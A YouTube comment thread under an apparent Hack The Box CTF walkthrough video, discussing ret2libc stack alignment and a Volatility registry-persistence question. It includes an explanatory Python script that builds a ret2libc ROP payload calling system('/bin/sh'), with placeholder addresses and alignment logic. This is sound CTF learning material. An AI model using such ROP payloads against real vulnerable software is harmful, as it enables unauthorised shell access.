I was so mad that I didn't know how to align the stack using RET gadget, thank you for your great video
@_CryptoCat 3 years ago
haha it always used to get me, now it's the first thing i think of when scripts aren't working remotely! thank you 🥰
@hackticlabs7536 3 years ago
Hi. For the ret2libc pwn challenge, I had this problem where the exploit was working locally but not on the actual remote target. Now after watching your video, I see you included an extra "ret" instruction before the rop chain. And you mentioned that it's for the stack alignment. Can you please point me to some resources to learn more about this behavior? How did you know that a ret instruction will fix the stack alignment issue? Where can I learn more about these stack alignment issues? Why does this stack alignment issue happen only on the remote target and not on the local? My apologies for so many questions. :S
@_CryptoCat 3 years ago
good questions! the stack needs to be 16 byte aligned so the payload @ line 64 (23:41) is OK as it is (4 x 8 = 32) but the second payload @ line 91 (24:56) is not since 3 x 8 = 24 (not 16 byte aligned). as for exactly why this is required on some systems but not others.. ROP Emporium can explain better than me in the "stack alignment" and "MOVAPS issue" section: ropemporium.com/guide.html#Common%20pitfalls - TLDR; some GLIBC libraries use movaps instruction which requires the 16 byte alignment
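The alignment rule from the reply above, worked through as an added example (this is not the video's exploit script and does not use pwntools). All gadget, libc and stack addresses are made-up placeholders; the stack slot holding the saved return address is assumed to sit at an address that is 8 mod 16, which is the usual case because the caller's rsp was 16-byte aligned before its `call` pushed the return address.

```python
"""Decide whether a ret2libc ROP chain needs an extra `ret` for stack alignment.

SysV AMD64 ABI: rsp % 16 == 0 immediately before a `call`, so at a function's
first instruction (after the pushed return address) rsp % 16 == 8. glibc's
system()/printf() may use movaps on a 16-byte-aligned stack slot and crash
(SIGSEGV) if that holds false. A lone `ret` gadget consumes one qword, which
shifts rsp by 8 and fixes the parity.
"""
import struct

# Constructed placeholder values (not taken from any real binary or libc).
OFFSET_TO_RET = 40                 # bytes from buffer start to saved return address
RET_SLOT_ADDR = 0x7FFD0000E1C8     # address of that saved return address (== 8 mod 16)
POP_RDI_RET = 0x00401263           # hypothetical "pop rdi; ret" gadget
RET = 0x0040101A                   # hypothetical lone "ret" gadget
SYSTEM = 0x7F0C12345678            # hypothetical libc system()
BINSH = 0x7F0C12987654             # hypothetical "/bin/sh" string in libc


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def rsp_at_gadget_entry(ret_slot_addr: int, index: int) -> int:
    """rsp when chain[index] starts executing.

    The vulnerable function's `ret` pops chain[0] from ret_slot_addr; every
    following qword is consumed exactly once, by a `ret` or a `pop`. So
    chain[index] is popped from ret_slot_addr + 8*index and rsp is 8 past it.
    """
    return ret_slot_addr + 8 * index + 8


def entry_is_aligned(rsp: int) -> bool:
    """True if rsp looks like a normal function entry (8 mod 16)."""
    return rsp % 16 == 8


def build_chain(ret_slot_addr: int, pop_rdi: int, binsh: int, system: int, ret: int) -> list:
    """pop rdi; "/bin/sh"; system  -- prefixed with `ret` only if needed."""
    chain = [pop_rdi, binsh, system]
    system_index = 2
    if not entry_is_aligned(rsp_at_gadget_entry(ret_slot_addr, system_index)):
        chain.insert(0, ret)      # shifts system() by one qword
        system_index += 1
    assert entry_is_aligned(rsp_at_gadget_entry(ret_slot_addr, system_index))
    return chain


def build_payload(offset: int, chain: list) -> bytes:
    return b"A" * offset + b"".join(p64(g) for g in chain)


if __name__ == "__main__":
    chain = build_chain(RET_SLOT_ADDR, POP_RDI_RET, BINSH, SYSTEM, RET)
    print("chain qwords:", len(chain), "ret inserted:", chain[0] == RET)
    print("payload length:", len(build_payload(OFFSET_TO_RET, chain)))
```

With the saved-return slot at 8 mod 16, the 3-qword chain lands system() on a 16-byte-aligned rsp and gets the `ret` inserted (4 x 8 = 32 bytes, as in the reply); a chain that already places system() at 8 mod 16 is left alone. Whether a given libc build actually crashes without the fix depends on whether its system() path executes a movaps, which is why the same script can work locally and fail remotely.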
@hadrian3689 3 years ago
These series are a master class on each pentesting subject all on their own. Great stuff
@_CryptoCat 3 years ago
thank you bro 🥰🥰🥰
@Blueskycandles 3 years ago
Hi
@_CryptoCat 3 years ago
@Blueskycandles hey 🥰
@gontanaka4045 3 years ago
You make it look easy but there are so many layers of knowledge behind. Thank you.
@_CryptoCat 3 years ago
love to hear it! thank you 😻
@antimatter6728 3 years ago
Thank you for uploading this! The way you show how to exploit the pwn challenge with your script really helped me understand the process 👍👍
@_CryptoCat 3 years ago
awesome!! thank you 🥰
@hhhhongasdf 3 years ago
Thank you for the useful and great video. I have a question about the forensics challenge "Persist", so it would be nice if you could answer it. What is the difference between printkey -K "Microsoft\Windows\CurrentVersion\Run" and printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"?
@_CryptoCat 3 years ago
thank you and great question! 😊 if you run printkey -K "Microsoft\Windows\CurrentVersion\Run" and there are multiple hives containing this key, it will print them all. if you run printkey -K "Software\Microsoft\Windows\CurrentVersion\Run" it will only look in "Software" for the "Microsoft\Windows\CurrentVersion\Run" key.
@hhhhongasdf 3 years ago
@_CryptoCat Oh! That said, if you want a detailed look at the registry keys used for persistence, you might want to type printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"! Thank you so much for the reply, it was very helpful!
@zak6820 3 years ago
I can't wait for the fourth and fifth challenges (web)
@_CryptoCat 3 years ago
awesome! stay tuned 😉
@SumitSingh-xu4qs 3 years ago
awesome work + knowledge brother
@_CryptoCat 3 years ago
thank you bro 🥰
@venatorgamer5051 3 years ago
Nice Thumbnail.
@_CryptoCat 3 years ago
haha thanks, i borrowed it from HTB and did some 1337 editing, aka changed the hue 😂
@Kdaddyis 3 years ago
Can I play those challenges for free in HTB?
@_CryptoCat 3 years ago
they were available for download for a week (5 days during the competition and for 2 days after) but i think it's too late now. maybe they will release some as retired challenges on HTB 🤔 i still have some challenge files so if there's a specific file you are looking for let me know!
@Kdaddyis 3 years ago
@_CryptoCat thanks for replying.. I'm looking for those pwn challenges
@_CryptoCat 3 years ago
@Kdaddyis no problem mate, it's against HTB rules to publish the files but if you message me on discord i can send those ones to you - crypto#4049 😉